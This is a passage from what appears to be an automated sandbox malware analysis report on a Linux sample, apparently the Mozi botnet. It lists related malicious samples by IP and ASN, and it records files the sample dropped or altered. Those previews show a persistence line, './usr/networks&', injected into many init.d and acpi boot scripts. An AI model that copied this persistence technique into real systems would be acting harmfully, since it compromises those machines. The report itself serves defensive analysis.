                                                • 67.215.246.10
                                                FhhkmGmDGr.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                yVn2ywuhEC.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                bin.shGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                iGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                Mozi.mGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                Photo.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                BitTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                3.4.5_41712.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                new.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent Stable(3.4.2 build 37754).exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                bttracker.acc.umu.serIbyGX66OpGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                MGuvcs6OczGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                bin.shGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                iGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                Mozi.mGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                Photo.exeGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                new.exeGet hashmaliciousBrowse
                                                • 130.239.18.159

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                BAYAN-TELECOMMUNICATIONSBayanTelecommunicationsIncPH69P.O 2315_PDF.exeGet hashmaliciousBrowse
                                                • 202.78.98.70
                                                40INVOICE BTS_Pdf.exeGet hashmaliciousBrowse
                                                • 202.78.98.70
                                                17Bill of lading Status_pdf.exeGet hashmaliciousBrowse
                                                • 202.78.98.70
                                                SAMSUNGSDS-AS-KRSamsungSDSIncKRppc_unpackedGet hashmaliciousBrowse
                                                • 123.43.12.39
                                                1.shGet hashmaliciousBrowse
                                                • 182.197.64.210
                                                https://firebasestorage.googleapis.com/v0/b/project66-f1a92.appspot.com/o/index%205.html?alt=media&token=eeb66e8e-6465-4503-ab4c-deb6ebb2895b#email=ld@tsl.texas.govGet hashmaliciousBrowse
                                                • 211.45.27.231
                                                https://www.samsungsds.com/us/en/solutions/bns/high-performance-computing/hpc-managed-services.htmlGet hashmaliciousBrowse
                                                • 112.106.25.115
                                                ipz.exeGet hashmaliciousBrowse
                                                • 123.46.27.42
                                                Wannacr.exeGet hashmaliciousBrowse
                                                • 182.193.112.249
                                                6Attachmen.exeGet hashmaliciousBrowse
                                                • 203.254.224.12
                                                27readm.exeGet hashmaliciousBrowse
                                                • 63.124.79.254
                                                8b9eaeff00382210a583a0b5611c1d3f_976b00382cbb63c03e8fcd6677e4f973_Kovter.exeGet hashmaliciousBrowse
                                                • 123.46.7.183
                                                65ATTACHMEN.exeGet hashmaliciousBrowse
                                                • 63.124.79.254
                                                BSNL-NIBNationalInternetBackboneIN94a5cd81_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                • 117.252.68.211
                                                db7db588_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                • 117.252.68.211
                                                fTXDq_9l7R2B0vcJRNsxuiqMxwPxzPi4LKezkpuCM_E.dllGet hashmaliciousBrowse
                                                • 117.252.68.211
                                                JRyLnlTR1OGet hashmaliciousBrowse
                                                • 117.222.196.212
                                                MGuvcs6OczGet hashmaliciousBrowse
                                                • 117.213.41.118
                                                SecuriteInfo.com.Trojan.GenericKD.36426529.10317.dllGet hashmaliciousBrowse
                                                • 117.210.210.179
                                                SecuriteInfo.com.Exploit.Siggen3.14843.27490.xlsGet hashmaliciousBrowse
                                                • 117.210.210.179
                                                SecuriteInfo.com.Exploit.Siggen3.10089.3000.xlsGet hashmaliciousBrowse
                                                • 117.212.193.62
                                                DocuSign_167.xlsGet hashmaliciousBrowse
                                                • 117.212.193.62
                                                pNadrQriqg.exeGet hashmaliciousBrowse
                                                • 117.212.193.62
                                                DmGtMcOds3.exeGet hashmaliciousBrowse
                                                • 117.212.193.62
                                                wtROGJDiTf.exeGet hashmaliciousBrowse
                                                • 117.212.193.62
                                                wl0mBiXkW1.exeGet hashmaliciousBrowse
                                                • 117.212.193.62
                                                opgVccK0a8.exeGet hashmaliciousBrowse
                                                • 117.212.193.62
                                                bdoVxDz0iK.exeGet hashmaliciousBrowse
                                                • 117.212.193.62
                                                KNJ725Xas2.exeGet hashmaliciousBrowse
                                                • 117.212.193.62
                                                eDwrLWqVGL.exeGet hashmaliciousBrowse
                                                • 117.212.193.62
                                                yVn2ywuhEC.exeGet hashmaliciousBrowse
                                                • 59.97.170.49
                                                iGet hashmaliciousBrowse
                                                • 117.202.65.25
                                                Mozi.mGet hashmaliciousBrowse
                                                • 117.215.212.106
                                                VODAFONE_ESESNEW ORDER - BLL04658464.exeGet hashmaliciousBrowse
                                                • 77.225.199.11
                                                1.shGet hashmaliciousBrowse
                                                • 62.174.196.171
                                                kF1JPCXvSq.dllGet hashmaliciousBrowse
                                                • 77.211.30.202
                                                oHqMFmPndx.exeGet hashmaliciousBrowse
                                                • 77.227.201.169
                                                Mozi.mGet hashmaliciousBrowse
                                                • 77.228.102.211
                                                svchost.exeGet hashmaliciousBrowse
                                                • 47.62.31.99
                                                xSG1uEU76i.exeGet hashmaliciousBrowse
                                                • 87.125.185.111
                                                http://dl.acestream.org/Ace_Stream_Media_3.1.32.exeGet hashmaliciousBrowse
                                                • 194.220.58.10
                                                Phot.exeGet hashmaliciousBrowse
                                                • 77.224.72.5
                                                trezarcoin-qt.exeGet hashmaliciousBrowse
                                                • 77.231.64.45

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                /etc/init.d/S95baby.shrIbyGX66OpGet hashmaliciousBrowse
                                                  MGuvcs6OczGet hashmaliciousBrowse
                                                    mozi.a.zipGet hashmaliciousBrowse
                                                      bin.shGet hashmaliciousBrowse
                                                        iGet hashmaliciousBrowse
                                                          Mozi.mGet hashmaliciousBrowse
                                                            Mozi.mGet hashmaliciousBrowse
                                                              1skm346XtzGet hashmaliciousBrowse
                                                                Mozi.aGet hashmaliciousBrowse
                                                                  Mozi.1.mGet hashmaliciousBrowse
                                                                    6wuvHEBHt8.binGet hashmaliciousBrowse
                                                                      7v1ic5IS8IGet hashmaliciousBrowse
                                                                        Mozi.aGet hashmaliciousBrowse
                                                                          Mozi.aGet hashmaliciousBrowse
                                                                            Mozi.mGet hashmaliciousBrowse
                                                                              Mozi.mGet hashmaliciousBrowse
                                                                                Mozi.mGet hashmaliciousBrowse
                                                                                  bad_fileGet hashmaliciousBrowse
                                                                                    mxjzQQFgLpGet hashmaliciousBrowse
                                                                                      JrAL1wW1MQGet hashmaliciousBrowse
                                                                                        /etc/rcS.d/S95baby.shrIbyGX66OpGet hashmaliciousBrowse
                                                                                          MGuvcs6OczGet hashmaliciousBrowse
                                                                                            mozi.a.zipGet hashmaliciousBrowse
                                                                                              bin.shGet hashmaliciousBrowse
                                                                                                iGet hashmaliciousBrowse
                                                                                                  Mozi.mGet hashmaliciousBrowse
                                                                                                    Mozi.mGet hashmaliciousBrowse
                                                                                                      1skm346XtzGet hashmaliciousBrowse
                                                                                                        Mozi.aGet hashmaliciousBrowse
                                                                                                          Mozi.1.mGet hashmaliciousBrowse
                                                                                                            6wuvHEBHt8.binGet hashmaliciousBrowse
                                                                                                              7v1ic5IS8IGet hashmaliciousBrowse
                                                                                                                Mozi.aGet hashmaliciousBrowse
                                                                                                                  Mozi.aGet hashmaliciousBrowse
                                                                                                                    Mozi.mGet hashmaliciousBrowse
                                                                                                                      Mozi.mGet hashmaliciousBrowse
                                                                                                                        Mozi.mGet hashmaliciousBrowse
                                                                                                                          bad_fileGet hashmaliciousBrowse
                                                                                                                            mxjzQQFgLpGet hashmaliciousBrowse
                                                                                                                              JrAL1wW1MQGet hashmaliciousBrowse

                                                                                                                                Created / dropped Files

                                                                                                                                /boot/grub/i386-pc/modinfo.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/acpi/asus-keyboard-backlight.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):326
                                                                                                                                Entropy (8bit):5.2904323771702915
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
                                                                                                                                MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
                                                                                                                                SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                                                                                                SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                                                                                                SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                                                                                /etc/acpi/asus-wireless.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):157
                                                                                                                                Entropy (8bit):4.412729940630044
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
                                                                                                                                MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                                                                                                SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                                                                                                SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                                                                                                SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                                                                                /etc/acpi/ibm-wireless.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):636
                                                                                                                                Entropy (8bit):4.722087767454589
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
                                                                                                                                MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                                                                                                SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                                                                                                SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                                                                                                SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                                                                                /etc/acpi/powerbtn.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2079
                                                                                                                                Entropy (8bit):4.778187000249208
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:pDpMMOMTeMn/zV5rh/1RzUKH2Z8uBiXGp2fVU6GjJN+V4ATo+aZ+:pCgeCrhXHzDfVpmhC/
                                                                                                                                MD5:CF725BE1199B06F062A47095420F7DC5
                                                                                                                                SHA1:98F1BC7C1B81C708B326BB3DC1C33AA3F29D8BBE
                                                                                                                                SHA-256:C617FF036646CF1EEF3AC91EC504093CC25C93E07850276AA37AA2542A724B01
                                                                                                                                SHA-512:D2F9649FED4B309108F2C67F28B1EE66C30219AF9B36F30E85F190064B3D5A65963BF6B9D3A8662A2197B47DFECA95D52447D7FCA4CDBAA69BB722BE5417DC50
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&. exit 0.fi..# getXuser gets the X user belonging to the display in $displaynum..# If you want the foreground X user, use getXconsole!.getXuser() {. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-s
                                                                                                                                /etc/acpi/tosh-wireless.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):483
                                                                                                                                Entropy (8bit):4.215331622973397
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
                                                                                                                                MD5:07889D65619CDB80F8E876A087F160D3
                                                                                                                                SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
                                                                                                                                SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
                                                                                                                                SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                                                                                                /etc/acpi/undock.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):266
                                                                                                                                Entropy (8bit):4.77497394042067
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
                                                                                                                                MD5:5E3A15E41D35EC409613236A20B5783E
                                                                                                                                SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
                                                                                                                                SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
                                                                                                                                SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                                                                                                /etc/bash_completion.d/libreoffice.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/init.d/S95baby.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:POSIX shell script, ASCII text executable
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25
                                                                                                                                Entropy (8bit):3.8936606896881854
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:TKH4v0VJ:hK
                                                                                                                                MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                                                SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                                                SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                                                SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                                                Malicious:true
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: rIbyGX66Op, Detection: malicious, Browse
                                                                                                                                • Filename: MGuvcs6Ocz, Detection: malicious, Browse
                                                                                                                                • Filename: mozi.a.zip, Detection: malicious, Browse
                                                                                                                                • Filename: bin.sh, Detection: malicious, Browse
                                                                                                                                • Filename: i, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                                                • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                                                • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: bad_file, Detection: malicious, Browse
                                                                                                                                • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                                                • Filename: JrAL1wW1MQ, Detection: malicious, Browse
                                                                                                                                Preview: #!/bin/sh./usr/networks&.
                                                                                                                                /etc/init.d/bootmisc.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):148
                                                                                                                                Entropy (8bit):4.718194263525147
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4KXGK+R0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4GX+R0Voo+v7n
                                                                                                                                MD5:68EC1ED64500D143FE44D1ED0B19DD83
                                                                                                                                SHA1:90AE6027194C555ED6DE71191682E1773DD8E609
                                                                                                                                SHA-256:F450F84C27D8339C63251AEB3DC06634AC42E8F4B0AFDA734E1044B5453ECF0D
                                                                                                                                SHA-512:C9CD195893143DE17D2029672DA2236C7EC44498B1B5F13526CCA56665388790A198ECD0F2FE097FB8D035F780AFFCC5F984DDE1D0540AA778892F52E7698EBB
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: bootmisc.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/checkfs.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):147
                                                                                                                                Entropy (8bit):4.7173471450646
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4AGXi0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4u0Voo+v7n
                                                                                                                                MD5:FC904BF1583E7C4398FCCDF2D3276902
                                                                                                                                SHA1:25D51112D0A6C9C977F4BB0B73BB3B4F278074A3
                                                                                                                                SHA-256:059F2548AB66249C86CC868222E9CA0B44123E23A99D4D3581044D1306730BD7
                                                                                                                                SHA-512:DF7FC2EE581E67BC3282F05FB8DC33FCAF86B29F564E5CB43965AFDB6AE7422D06A6091A18375B3544F495CA827B6CC6B213FF4FFE7AEC252C326B8D56B4CF84
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/checkroot-bootclean.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):250
                                                                                                                                Entropy (8bit):4.872318043360431
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4YDi0Voo+v7n:AGKE3fdARMsBLbYerTn
                                                                                                                                MD5:1B20C93FFEABBAA880FEB038394DA3EE
                                                                                                                                SHA1:CDD8FDC804AE4D7464E3B67B26F52C53C5EEAD13
                                                                                                                                SHA-256:3A63188036AB39E080E5035091441EFB91BF22F20C9292900929CA8F04D0F280
                                                                                                                                SHA-512:E2717119C05473DEB21FF60060813C6B4648FB6B94B524D76A15ED9506ED2BCFFA03108ABAB7CBF52A29D7507937749D0F9F420A96D4F75B499553434F836059
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkroot-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/checkroot.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3111
                                                                                                                                Entropy (8bit):4.922960717312443
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:l+bjYLN1LiQKt6CYuSB/VN7pL4TyKWSmdrBW71cBi8m:0sxx2cJBVxZH01cc8m
                                                                                                                                MD5:544D026D22E17EF8C1F59AE6EC1E5993
                                                                                                                                SHA1:F5BFEE80CBF31DAEC25CD0728F030580F539D88F
                                                                                                                                SHA-256:69A39FE65F95BBA2E445A39AA1F8AF941FDA210AB6A9174B0578B5AB36C5BE32
                                                                                                                                SHA-512:85CD0C7AE75DA853E5C4286BF4E3D9DE28D2916EDBE0CB7A42DC53AD7D8B02F7875C617DC4D4DD4A1C74333D9403C8D06C903F8F19AB11A3E221281B7CBF8837
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..# NOTE: "failure" is defined as exiting with a return code of..# 4 or larger. A return code of 1 indicates that file system..# errors were corrected but that the boot may proceed. A return..# code of 2 or 3 indicates that the system should immediately reboot...#..if [ "$FSCKCODE" -eq 32 ]..then...log_warning_msg "File system check was interrupted by user"..elif [ "$FSCKCODE" -gt 3 ]..then...# Surprise! Re-directing from a HERE document (as in "cat << EOF")...# does not work because the root is currently read-only....log_failure_msg "An automatic file system check (fsck) of the root filesystem failed. .A manual fsck must be performed, then the system restarted. .The fsck should be performed in maintenance mode with the .root filesystem mounted in read-only mode."...log_warning_msg "The root filesystem is currently mounted in read-only mode. .A maintenance shell will now be started. .After performing system maintenance, press CONTROL-D .to terminate the maintenance shell
                                                                                                                                /etc/init.d/hostname.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):404
                                                                                                                                Entropy (8bit):5.01878905639229
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:U20zRSdZ9iBbG2Us4Ji0SAGKFqLkMfF3teoWpAsBdA80F4n0u4hR9QR0Voo+v7n:Ul221wi0PGKE3fdpsBi8wlbHaNrTn
                                                                                                                                MD5:0A6F8F35CFF93CE8BBAB05E2DA2714C6
                                                                                                                                SHA1:9A865CEB2B56974A54694ED9D1D117043EA02727
                                                                                                                                SHA-256:4E41D7D95B11DBAD34E30EDE98DB6728873146F05FF45A4EF6943ADD1F71D0A1
                                                                                                                                SHA-512:F6E29642047487748B5BEC77C7429881B73FED48CAA9247CB788CFA2CE856D300B3FB6F8F4C8D6F18ED710B5237B331BC03ABE03222296EE12F1256D5222B537
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit $ES.}..do_status () {..HOSTNAME=$(hostname)..if [ "$HOSTNAME" ] ; then...return 0..else...return 4..fi.}..case "$1" in. start|"")..do_start..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop)..# No-op..;;. status)..do_status..exit $?..;;. *)..echo "Usage: hostname.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/hwclock.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/init.d/mountall-bootclean.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):249
                                                                                                                                Entropy (8bit):4.8912088003487595
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4iea2ii0Voo+v7n:AGKE3fdARMsBLbxPrTn
                                                                                                                                MD5:11FEEF13321D348864E7632D0746ECA2
                                                                                                                                SHA1:8D763DA6837280846D90AAACA3122D4F5CC0C62D
                                                                                                                                SHA-256:3DFE238D111564682893276C28BB49367C38A1F07A873B8F79E4FA8291FD7FE7
